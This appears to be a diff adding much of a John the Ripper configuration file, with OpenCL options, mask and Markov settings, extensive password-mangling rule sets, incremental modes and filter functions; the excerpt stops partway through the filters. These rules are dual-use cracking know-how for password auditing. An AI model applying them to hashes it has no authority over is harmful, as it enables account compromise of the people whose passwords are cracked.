+#ForceScalar = Y
+
+# Global build options. Format-specific build options below may be
+# concatenated to this.
+GlobalBuildOpts = -cl-mad-enable
+
+# Initial local work-size for auto-tune (CPU devices excepted).
+# 0 means let the OpenCL implementation pick a suitable value.
+# 1 means query for "best multiple" (usually corresponds to "warp size").
+# Any other value (eg. 64) will be taken verbatim.
+AutotuneLWS = 1
+
+
+# Format-specific settings:
+
+# Uncomment the below for nvidia sm_30 and beyond.
+# Please, check if it is really better.
+#sha512crypt_BuildOpts = -cl-nv-maxrregcount=80
+
+# Best configuration value to be used at runtime.
+sha512crypt_Bonaire = -DUNROLL_LOOP=132104
+
+# Example: Override auto-tune for RAR format.
+#rar_LWS = 128
+#rar_GWS = 8192
+
+[List.OpenCL:Drivers]
+#Driver ; Description         ; Recommendation
+#AMD driver versions
+938 , 2 ; 12.8                ;
+1084, 4 ; 13.1                ;
+1124, 2 ; 13.4                ;
+1214, 3 ; 13.6 beta           ;
+1311, 2 ; 13.11 beta-1        ;
+1348, 5 ; 13.12               ;
+1445, 5 ; 14.4 (Mantle)       ;
+1526, 3 ; 14.6 beta (Mantle)  ;
+1573, 4 ; 14.9 (Mantle)       ; VGL S
+1642, 5 ; 14.12 (Omega)       ; VGL S
+1702, 3 ; 15.5 beta           ;     T
+1729, 3 ; 15.5                ;
+1800, 5 ; 15.7                ; VG* R
+1800, 8 ; 15.7.1              ; VGW R
+1800, 11; 15.9                ; VGL S
+1912, 5 ; 15.12               ;
+#NVIDIA driver versions
+346, 0  ;                     ; N*  R
+319, 0  ;                     ; N*  S
+#End
+0, 0    ;                     ;
+
+#Labels
+# * -> all OS
+# N -> NVIDIA
+# G -> GCN
+# V -> VLIW4 and VLIW5
+# W -> Windows
+# L -> Linux
+# R -> recommended
+# S -> supported
+# T -> not recommended: really bad software. I mean "trash".
+
+[PRINCE]
+# Default wordlist file name. Will fall back to standard wordlist if not
+# defined.
+#Wordlist = $JOHN/password.lst
+
+
+# Markov modes, see ../doc/MARKOV for more information
+[Markov:Default]
+# Default Markov mode settings
+#
+# Statsfile cannot be specified on the command line, so
+# specifying it here is mandatory
+Statsfile = $JOHN/stats
+# MkvLvl and MkvMaxLen should also be specified here, as a fallback for
+# --markov usage without specifying LEVEL and/or --max-length on the
+# command line.
+MkvLvl = 200
+MkvMaxLen = 12
+# MkvMinLvl and MkvMinLen should not be specified at all in [Markov:Default],
+# or they should be equal to 0 (which is the default if not specified.
+# MkvMinLvl and MkvMinLen can be used in other Markov mode sections
+# except [Markov:Default]
+; MkvMinLvl = 0
+; MkvMinLen = 0
+
+# A user defined character class is named with a single digit, ie. 0..9. After
+# the equal-sign, just list all characters that this class should match. You
+# can specify ranges within brackets, much like pre-processor ranges in rules.
+# BEWARE of encoding if using non-ASCII characters. If you put UTF-8 characters
+# here, it will *not* work! You must use a singlebyte encoding and it should
+# be the same here as you intend to use for your dictionary.
+# You can however put characters here in \xA3 format (for codepoint 0xA3 - in
+# many iso-8859 codepages that would mean a pound sign). This works in ranges
+# too. Using \x00 is not supported though - it will not be parsed as null.
+#
+# This is a couple of example classes:
+# ?0 matches (one version of) base64 characters
+# ?1 matches hex digits
+# ?2 matches the TAB character (never try to use \x00!)
+[UserClasses]
+0 = [a-zA-Z0-9/.]
+1 = [0-9a-fA-F]
+2 = \x09
+
+[Mask]
+# When iterating over length, emit a status line after each length is done
+MaskLengthIterStatus = Y
+
+# Default mask for -mask if none is given. This is same as hashcat's default.
+DefaultMask = ?1?2?2?2?2?2?2?3?3?3?3?d?d?d?d
+
+# Default mask for Hybrid mask mode if none is given.
+DefaultHybridMask = ?w?d?d?d?d
+
+# Mask mode have custom placeholders ?1..?9 that look similar to user classes
+# but are a different thing. They are merely defaults for the -1..-9 command
+# line options. As delivered, they resemble hashcat's defaults.
+1 = ?l?d?u
+2 = ?l?d
+3 = ?l?d*!$@_
+4 =
+5 =
+6 =
+7 =
+8 =
+9 =
+
+[Subsets]
+# When iterating over length, emit a status line after each length is done
+LengthIterStatus = Y
+
+# Min/Max number of unique characters. MaxDiff can't be set larger than 16.
+MinDiff = 1
+MaxDiff = 7
+
+# Default charset, either a literal string or a single-digit number pointing
+# to one of the sets below. If not defined, all printable ASCII is used.
+#DefaultCharset = 0
+
+# Subsets mode charsets 0-9. These are literal strings. TAB and space
+# characters can be used as long as they do not come first or last. The only
+# "magic" used here is \U+HHHH or \U+HHHHH for any Unicode character (except
+# the very highest private area that has six hex digits). For example, you
+# could say \U+1F600 for a "Grinning Face".
+0 = 0123456789abcdef
+1 = ABCDEF0123456789
+2 = 0123456789abcdefghijklmnopqrstuvwxyzàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿABCDEFGHIJKLMNOPQRSTUVWXYZÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿
+3 = 0123456789άέήίαβγδεζηθικλμνξοπρςστυφχψωϊϋόύώΆΈΉΊΌΎΏΑΒΓΔΕΖΗΘΙΚΛΜΝΞΟΠΡΣΤΥΦΧΨΩΪΫ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+4 = 0123456789абвгдежзийклмнопрстуфхцчшщъыьэюяёЁАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ№ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+5 =
+6 =
+7 =
+8 =
+9 =
+
+[Regen_Salts_UserClasses]
+# These are user defined character sets.  Their purpose is to allow custom salt
+# values to be used within the salt_regen logic.  These will be the characters
+# to use for this character within the salt.  So if we had a salt that was 4
+# characters, and 0-9a-m, we can easily do this by 0 = [0-9a-m].  If this is
+# used, the regen salt value would be ?0?0?0?0 and salts such as a47m 2kd5
+# would be valid.
+1 = [1-9]
+
+# A "no rules" rule for eg. super-fast Single mode (use with --single=none)
+[List.Rules:None]
+:
+
+# A "drop all" rule for even faster Single mode (debugging :)
+[List.Rules:Drop]
+<1'0
+
+# These are good rules on larger sites where a user ID may already be used,
+# so a user simply appends numbers to create his loginID, but then uses the
+# login name he wanted as basis for password. Just strip off digits and treat
+# the base-word to some manipulation. These rules found from the 2015 A-M
+# leak.  Only adds 30-50 permutations and only applied to user names that have
+# digits contained within them, and cracks quite a few.
+# These are currently Jumbo-specific.
+[List.Rules:JumboSingle]
+/?d @?d >4
+/?d @?d M @?A >4 Q
+-c /?d @?d >4 M [lc] Q
+-c /?d @?d M @?A >4 Q M [lc] Q
+@?D Q >4
+/?d @?d >3 <* $[0-9] Q
+-c /?d @?d >3 <* M [lc] Q $[0-9]
+/?d @?d >3 <- Az"12" <+ Q
+-c /?d @?d >3 <- M [lc] Q Az"12" <+
+/?d @?d >3 Az"123" <+ Q
+-c /?d @?d >3 M [lc] Q Az"123" <+
+/?d @?d >2 al d
+-c /?d @?d >2 al M [lc] Q d
+(?a )?d /?d a0 'p Xpz0
+)?a (?d /?a a0 'p Xpz0
+
+
+# "Single crack" mode rules
+[List.Rules:Single]
+# Simple rules come first...
+:
+-s x**
+-c (?a c Q
+-c l Q
+-s-c x** /?u l
+# These were not included in crackers I've seen, but are pretty efficient,
+# so I include them near the beginning
+-<6 ->6 >6 '6
+-<7 ->7 >7 '7 l
+-<6 ->6 -c >6 '6 /?u l
+-<5 ->5 >5 '5
+
+# Wedge the Jumbo-specific addons in here!
+.include [List.Rules:JumboSingle]
+
+# Weird order, eh? Can't do anything about it, the order is based on the
+# number of successful cracks...
+al d
+a0 r c
+-c al (?a d c
+-<5 ->5 -c >5 '5 /?u l
+-c a0 u Q
+-c a0 )?a r l
+-[:c] <* !?A \p1[lc] p
+-c al c Q d
+-<7 ->7 -c >7 '7 /?u
+-<4 ->4 >4 '4 l
+-c a0 (?l c r
+-c a0 )?l l Tm
+-<3 ->3 >3 '3
+-<4 ->4 -c >4 '4 /?u
+-<3 ->3 -c >3 '3 /?u l
+-c a0 u Q r
+al d M 'l f Q
+-c al l Q d M 'l f Q
+# About 50% of single-mode-crackable passwords get cracked by now...
+# >2 x12 ... >8 x18
+->[3-9] >\p[2-8] x1\0
+->9 >9 \[
+# >3 x22 ... >9 x28
+->[4-9A] >\p[3-9] x2\p[2-8]
+# >4 x32 ... >9 x37
+->[5-9A] >\p[4-9] x3\p[2-7]
+# >2 x12 /?u l ... >8 x18 /?u l
+-c ->[3-9] >\p[2-8] x1\0 /?u l
+-c ->9 >9 \[ /?u l
+# >3 x22 /?u l ... >9 x28 /?u l
+-c ->[4-9A] >\p[3-9] x2\p[2-8] /?u l
+# >4 x32 /?u l ... >9 x37 /?u l
+-c ->[5-9A] >\p[4-9] x3\p[2-7] /?u l
+# Now to the suffix stuff...
+a1 l $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-c a1 (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-[:c] a1 !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
+-[:c] a1 /?A (?\p1[za] \p1[lc] $s
+a1 l r $[1-9!]
+-c a1 /?a u $[1-9!]
+-[:c] a2 (?\p1[za] \p1[lc] Az"'s"
+-[:c] a2 (?\p1[za] \p1[lc] Az"!!"
+-[:c] a3 (?\p1[za] \p1[lc] Az"!!!"
+# Removing vowels...
+-[:c] b1 /?v @?v >2 (?\p1[za] \p1[lc]
+/?v @?v >2 al d
+# crack -> cracked, crack -> cracking
+<* l [PI]
+-c <* l [PI] (?a c
+# mary -> marie
+-[:c] a1 (?\p1[za] \p1[lc] )y omi $e
+# marie -> mary
+-[:c] b1 (?\p1[za] \p1[lc] )e \] )i val1 oay
+# The following are some 3l33t rules
+-[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
+-[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
+-[:c] l /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-[:c] l /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /o /s so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-[:c] l /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+# Now to the prefix stuff...
+l ^[1a-z2-90]
+-c l Q ^[A-Z]
+^[A-Z]
+l ^["-/:-@\[-`{-~]
+-[:c] <9 (?a \p1[lc] A0"[tT]he"
+-[:c] <9 (?a \p1[lc] A0"[aA]my"
+-[:c] <9 (?a \p1[lc] A0"[mdMD]r"
+-[:c] <9 (?a \p1[lc] A0"[mdMD]r."
+-[:c] <9 (?a \p1[lc] A0"__"
+<- !?A l p ^[240-9]
+# Some word pair rules...
+# johnsmith -> JohnSmith, johnSmith
+-p-c (?a 2 (?a c 1 [cl]
+# JohnSmith -> john smith, john_smith, john-smith
+-p 1 <- $[ _\-] + l
+# JohnSmith -> John smith, John_smith, John-smith
+-p-c 1 <- (?a c $[ _\-] 2 l
+# JohnSmith -> john Smith, john_Smith, john-Smith
+-p-c 1 <- l $[ _\-] 2 (?a c
+# johnsmith -> John Smith, John_Smith, John-Smith
+-p-c 1 <- (?a c $[ _\-] 2 (?a c
+# Applying different simple rules to each of the two words
+-p-[c:] 1 \p1[ur] 2 l
+-p-c 2 (?a c 1 [ur]
+-p-[c:] 1 l 2 \p1[ur]
+-p-c 1 (?a c 2 [ur]
+# jsmith -> smithj, etc...
+-[:c] (?a \p1[lc] [{}]
+-[:c] (?a \p1[lc] [{}] \0
+# Toggle case...
+-c <+ )?u l Tm
+-c T0 Q M c Q l Q u Q C Q X0z0 'l
+-c T[1-9A-E] Q M l Tm Q C Q u Q l Q c Q X0z0 'l
+-c l Q T[1-9A-E] Q M T\0 Q l Tm Q C Q u Q X0z0 'l
+-c >2 <G %2?a [lu] T0 M T2 T4 T6 T8 TA TC TE Q M l Tm Q X0z0 'l
+-c >2 /?l /?u t Q M c Q C Q l Tm Q X0z0 'l
+# Deleting chars...
+>[2-8] D\p[1-7]
+>[8-9A-E] D\1
+-c /?u >[2-8] D\p[1-7] l
+-c /?u >[8-9A-E] D\1 l
+=1?a \[ M c Q
+-c (?a >[1-9A-E] D\1 c
+# Inserting a dot...
+-[:c] >3 (?a \p1[lc] i[12].
+# More suffix stuff...
+<- l Az"[190][0-9]"
+-c <- (?a c Az"[190][0-9]"
+<- l Az"[782][0-9]"
+-c <- (?a c Az"[782][0-9]"
+<* l $[A-Z]
+-c <* (?a c $[A-Z]
+# cracking -> CRACKiNG
+-c u /I sIi
+# Crack96 -> cRACK96
+%2?a C Q
+# Crack96 -> cRACK(^
+/?A S Q
+# Crack96 -> CRaCK96
+-c /?v V Q
+# Really weird charset conversions, like "england" -> "rmh;smf"
+:[RL] Q
+l Q [RL]
+-c (?a c Q [RL]
+:[RL] \0 Q
+# Both prefixing and suffixing...
+<- l ^[1!@#$%^&*\-=_+.?|:'"] $\1
+<- l ^[({[<] $\p[)}\]>]
+# The rest of two-digit suffix stuff, less common numbers...
+<- l Az"[63-5][0-9]"
+-c <- (?a c Az"[63-5][0-9]"
+# Some multi-digit numbers...
+-[:c] (?a \p1[lc] Az"007" <+
+-[:c] (?a \p1[lc] Az"123" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0" <+
+-[:c] (?a \p1[lc] Az"1234" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0" <+
+-[:c] (?a \p1[lc] Az"12345" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0" <+
+-[:c] (?a \p1[lc] Az"123456" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0\0" <+
+# Some [birth] years...
+l Az"19[7-96-0]" <+ >-
+l Az"20[01]" <+ >-
+l Az"19[7-9][0-9]" <+
+l Az"20[01][0-9]" <+
+l Az"19[6-0][9-0]" <+
+
+[List.Rules:Extra]
+# Insert/overstrike some characters...
+!?A >[1-6] l i\0[a-z]
+!?A l o0[a-z]
+!?A >[1-7] l o\0[a-z]
+# Toggle case everywhere (up to length 8), assuming that certain case
+# combinations were already tried.
+-c T1 Q M T0 Q
+-c T2 Q M T[z0] T[z1] Q
+-c T3 Q M T[z0] T[z1] T[z2] Q
+-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
+-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
+-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
+-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
+# Very slow stuff...
+l Az"[1-90][0-9][0-9]" <+
+-c (?a c Az"[1-90][0-9][0-9]" <+
+<[\-9] l A\p[z0]"[a-z][a-z]"
+<- l ^[a-z] $[a-z]
+
+# Wordlist mode rules
+[List.Rules:Wordlist]
+# Try words as they are
+:
+# Lowercase every pure alphanumeric word
+-c >3 !?X l Q
+# Capitalize every pure alphanumeric word
+-c (?a >2 !?X c Q
+# Lowercase and pluralize pure alphabetic words
+<* >2 !?A l p
+# Lowercase pure alphabetic words and append '1'
+<* >2 !?A l $1
+# Capitalize pure alphabetic words and append '1'
+-c <* >2 !?A c $1
+# Duplicate reasonably short pure alphabetic words (fred -> fredfred)
+<7 >1 al !?A l d
+# Lowercase and reverse pure alphabetic words
+>3 !?A l M r Q
+# Prefix pure alphabetic words with '1'
+>2 !?A l ^1
+# Uppercase pure alphanumeric words
+-c >2 !?X u Q M c Q u
+# Lowercase pure alphabetic words and append a digit or simple punctuation
+<* >2 !?A l $[2!37954860.?]
+# Words containing punctuation, which is then squeezed out, lowercase
+/?p @?p >3 l
+# Words with vowels removed, lowercase
+/?v @?v >3 l
+# Words containing whitespace, which is then squeezed out, lowercase
+/?w @?w >3 l
+# Capitalize and duplicate short pure alphabetic words (fred -> FredFred)
+-c <7 >1 al !?A c d
+# Capitalize and reverse pure alphabetic words (fred -> derF)
+-c <+ >2 !?A c r
+# Reverse and capitalize pure alphabetic words (fred -> Derf)
+-c >2 !?A l M r Q c
+# Lowercase and reflect pure alphabetic words (fred -> fredderf)
+<7 >1 al !?A l d M 'l f Q
+# Uppercase the last letter of pure alphabetic words (fred -> freD)
+-c <+ >2 !?A l M r Q c r
+# Prefix pure alphabetic words with '2' or '4'
+>2 !?A l ^[24]
+# Capitalize pure alphabetic words and append a digit or simple punctuation
+-c <* >2 !?A c $[2!3957468.?0]
+# Prefix pure alphabetic words with digits
+>2 !?A l ^[379568]
+# Capitalize and pluralize pure alphabetic words of reasonable length
+-c <* >2 !?A c p
+# Lowercase/capitalize pure alphabetic words of reasonable length and convert:
+# crack -> cracked, crack -> cracking
+-[:c] <* >2 !?A \p1[lc] M [PI] Q
+# Try the second half of split passwords
+-s x**
+-s-c x** M l Q
+
+# Case toggler for cracking MD4-based NTLM hashes (with the contributed patch)
+# given already cracked DES-based LM hashes.  Use --rules=NT to use this.
+[List.Rules:NT]
+:
+-c T0Q
+-c ->2 a0 T1QT[z0]
+-c ->3 a0 T2QT[z0]T[z1]
+-c ->4 a0 T3QT[z0]T[z1]T[z2]
+-c ->5 a0 T4QT[z0]T[z1]T[z2]T[z3]
+-c ->6 a0 T5QT[z0]T[z1]T[z2]T[z3]T[z4]
+-c ->7 a0 T6QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]
+-c ->8 a0 T7QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]
+-c ->9 a0 T8QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]
+-c ->A a0 T9QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]
+-c ->B a0 TAQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]
+-c ->C a0 TBQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]
+-c ->D a0 TCQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]
+-c ->E a0 TDQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]T[zC]
+
+# Shift toggler, up to length 16
+[List.Rules:ShiftToggle]
+:
+W0Q
+->2 a0 W1QW[z0]
+->3 a0 W2QW[z0]W[z1]
+->4 a0 W3QW[z0]W[z1]W[z2]
+->5 a0 W4QW[z0]W[z1]W[z2]W[z3]
+->6 a0 W5QW[z0]W[z1]W[z2]W[z3]W[z4]
+->7 a0 W6QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]
+->8 a0 W7QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]
+->9 a0 W8QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]
+->A a0 W9QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]
+->B a0 WAQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]
+->C a0 WBQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]
+->D a0 WCQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]
+->E a0 WDQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]
+->F a0 WEQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]
+->G a0 WFQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]W[zE]
+
+# Used for loopback. This rule will produce candidates "PASSWOR" and "D" for
+# an input of "PASSWORD" (assuming LM, which has halves of length 7).
+[List.Rules:Split]
+:
+-s x**
+
+# Some Office <=2003 files have passwords truncated at 15
+[List.Rules:OldOffice]
+:
+->F -<F >F 'F
+
+# Rules from Hash Runner 2014
+[List.Rules:o1]
+# o[0-9A-Z][ -~]
+->\r[1-9A-ZZ] >\p[0-9A-Z] o\0[ -~] Q
+
+[List.Rules:o2]
+# o[0-9A-E][ -~] Q M o[0-9A-E][ -~] Q
+->[1-9A-F] ->[1-9A-F] >\p1[0-9A-E] >\p2[0-9A-E] o\3[ -~] Q M o\4[ -~] Q
+
+[List.Rules:o3]
+# o[0-9][ -~] Q M o[0-9][ -~] Q M o[0-9][ -~] Q
+->[1-9A] ->[1-9A] ->[1-9A] >\p1[0-9] >\p2[0-9] >\p3[0-9] o\4[ -~] Q M o\5[ -~] Q M o\6[ -~] Q
+
+[List.Rules:o]
+.include [List.Rules:o1]
+.include [List.Rules:o2]
+
+[List.Rules:i1]
+# i[0-9A-Z][ -~]
+->\r[2-9A-ZZZ] >\p1[0-9A-Z] i\0[ -~]
+
+[List.Rules:i2]
+# i[0-9A-E][ -~] i[0-9A-E][ -~]
+->[2-9A-G] ->[2-9A-G] >\p1[0-9A-E] >\p2[0-9A-E] i\3[ -~] i\4[ -~]
+
+[List.Rules:i3]
+# i[0-9][ -~] i[0-9][ -~] i[0-9][ -~]
+->[4-9A-D] ->[4-9A-D] ->[4-9A-D] >\p1[0-9] >\p2[0-9] >\p3[0-9] i\4[ -~] i\5[ -~] i\6[ -~]
+
+[List.Rules:i]
+.include [List.Rules:i1]
+.include [List.Rules:i2]
+
+[List.Rules:oi]
+.include [List.Rules:o1]
+.include [List.Rules:i1]
+.include [List.Rules:o2]
+.include [List.Rules:i2]
+
+[List.Rules:T9]
+a0 /?D l sa2 sb2 sc2 sd3 se3 sf3 sg4 sh4 si4 sj5 sk5 sl5 sm6 sn6 so6 sp7 sq7 sr7 ss7 st8 su8 sv8 sw9 sx9 sy9 sz9 s?D*
+a0 /?D l sa2 sb2 sc2 sd3 se3 sf3 sg4 sh4 si4 sj5 sk5 sl5 sm6 sn6 so6 sp7 sq7 sr7 ss7 st8 su8 sv8 sw9 sx9 sy9 sz9 /?D s?D#
+
+# A few rule sets from hashcat (taken as-is from https://github.com/hashcat/)
+#
+# Note that these are very poorly optimized with our measure, as they lack
+# rule-rejection flags. Also, they don't use the preprocessor so are a lot
+# harder to digest (for a human looking at them that is, for JtR there's
+# virtually no difference).
+#
+[List.Rules:best64]
+!! hashcat logic ON
+.include <rules/best64.rule>
+!! hashcat logic OFF
+
+[List.Rules:d3ad0ne]
+!! hashcat logic ON
+.include <rules/d3ad0ne.rule>
+!! hashcat logic OFF
+
+[List.Rules:dive]
+!! hashcat logic ON
+.include <rules/dive.rule>
+!! hashcat logic OFF
+
+[List.Rules:InsidePro]
+!! hashcat logic ON
+.include <rules/InsidePro-PasswordsPro.rule>
+!! hashcat logic OFF
+
+[List.Rules:T0XlC]
+!! hashcat logic ON
+.include <rules/T0XlC.rule>
+.include <rules/T0XlCv1.rule>
+.include <rules/T0XlC-insert_top_100_passwords_1_G.rule>
+!! hashcat logic OFF
+
+[List.Rules:rockyou-30000]
+!! hashcat logic ON
+.include <rules/rockyou-30000.rule>
+!! hashcat logic OFF
+
+[List.Rules:specific]
+!! hashcat logic ON
+.include <rules/specific.rule>
+!! hashcat logic OFF
+
+[List.Rules:hashcat]
+.include [List.Rules:best64]
+.include [List.Rules:d3ad0ne]
+.include [List.Rules:dive]
+.include [List.Rules:InsidePro]
+.include [List.Rules:T0XlC]
+.include [List.Rules:rockyou-30000]
+.include [List.Rules:specific]
+
+# These are for phrase wordlists w/ spaces
+[List.Rules:passphrase-rule1]
+.include <rules/passphrase-rule1.rule>
+
+[List.Rules:passphrase-rule2]
+.include <rules/passphrase-rule2.rule>
+
+# Default Loopback mode rules.
+[List.Rules:Loopback]
+.include [List.Rules:ShiftToggle]
+.include [List.Rules:Split]
+!! hashcat logic ON
+m
+-m
+!! hashcat logic OFF
+b1 ]
+
+# For Single Mode against fast hashes
+[List.Rules:Single-Extra]
+.include [List.Rules:Single]
+.include [List.Rules:Extra]
+.include [List.Rules:OldOffice]
+
+# For Wordlist mode and very fast hashes
+[List.Rules:Jumbo]
+.include [List.Rules:Single-Extra]
+.include [List.Rules:Wordlist]
+.include [List.Rules:ShiftToggle]
+.include [List.Rules:best64]
+
+# KoreLogic rules
+.include <korelogic.conf>
+
+# Everything, including all KoreLogic and the rest of included hashcat rules.
+# Only for very fast hashes and/or Single mode. Some of these rules are of
+# ridiculous quality and lack optimizations - you have been warned.
+[List.Rules:All]
+.include [List.Rules:Jumbo]
+.include [List.Rules:KoreLogic]
+.include [List.Rules:T9]
+.include [List.Rules:hashcat]
+
+# Incremental modes
+
+# This is for one-off uses (make your own custom.chr)
+[Incremental:Custom]
+File = $JOHN/custom.chr
+MinLen = 0
+
+# The theoretical CharCount is 211, we've got 196.
+[Incremental:UTF8]
+File = $JOHN/utf8.chr
+MinLen = 0
+CharCount = 196
+
+# This is CP1252, a super-set of ISO-8859-1.
+# The theoretical CharCount is 219, we've got 203.
+[Incremental:Latin1]
+File = $JOHN/latin1.chr
+MinLen = 0
+CharCount = 203
+
+[Incremental:ASCII]
+File = $JOHN/ascii.chr
+MinLen = 0
+MaxLen = 13
+CharCount = 95
+
+[Incremental:LM_ASCII]
+File = $JOHN/lm_ascii.chr
+MinLen = 0
+MaxLen = 7
+CharCount = 69
+
+# This is CP858 (CP850 + Euro sign, superset of CP437).
+# The theoretical CharCount is 209 minus lowercase, we've got 132.
+[Incremental:LanMan]
+File = $JOHN/lanman.chr
+MinLen = 0
+MaxLen = 7
+CharCount = 132
+
+# This is alnum (upper & lower case) as well as space.
+[Incremental:Alnumspace]
+File = $JOHN/alnumspace.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 63
+
+[Incremental:Alnum]
+File = $JOHN/alnum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 62
+
+[Incremental:Alpha]
+File = $JOHN/alpha.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 52
+
+[Incremental:LowerNum]
+File = $JOHN/lowernum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 36
+
+[Incremental:UpperNum]
+File = $JOHN/uppernum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 36
+
+[Incremental:LowerSpace]
+File = $JOHN/lowerspace.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 27
+
+[Incremental:Lower]
+File = $JOHN/lower.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 26
+
+[Incremental:Upper]
+File = $JOHN/upper.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 26
+
+[Incremental:Digits]
+File = $JOHN/digits.chr
+MinLen = 1
+MaxLen = 20
+CharCount = 10
+
+# Some pre-defined word filters as used to generate the supplied .chr files
+[List.External:Filter_ASCII]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 0x20 || c > 0x7e || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LanMan]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i]) {
+		if (i >= 14) {			// of up to 14 characters long
+			word = 0; return;
+		}
+		if (c >= 'a' && c <= 'z')	// Convert to uppercase
+			word[i] &= 0xDF;
+		i++;
+	}
+
+	word[7] = 0;				// Truncate at 7 characters
+}
+
+[List.External:Filter_LM_ASCII]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i]) {
+		if (c < 0x20 || c > 0x7e ||	// Require ASCII-only
+		    i >= 14) {			// of up to 14 characters long
+			word = 0; return;
+		}
+		if (c >= 'a' && c <= 'z')	// Convert to uppercase
+			word[i] &= 0xDF;
+		i++;
+	}
+
+	word[7] = 0;				// Truncate at 7 characters
+}
+
+[List.External:Filter_Alnumspace]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c != ' ' && (((c < '0' || c > '9') &&
+	((c &= 0xDF) < 'A' || c > 'Z'))) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Alnum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < '0' || c > '9') && ((c &= 0xDF) < 'A' || c > 'Z')) ||
+	    i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Alpha]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if ((c &= 0xDF) < 'A' || c > 'Z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LowerNum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'a' || c > 'z') && (c < '0' || c > '9')) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_UpperNum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'A' || c > 'Z') && (c < '0' || c > '9')) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LowerSpace]
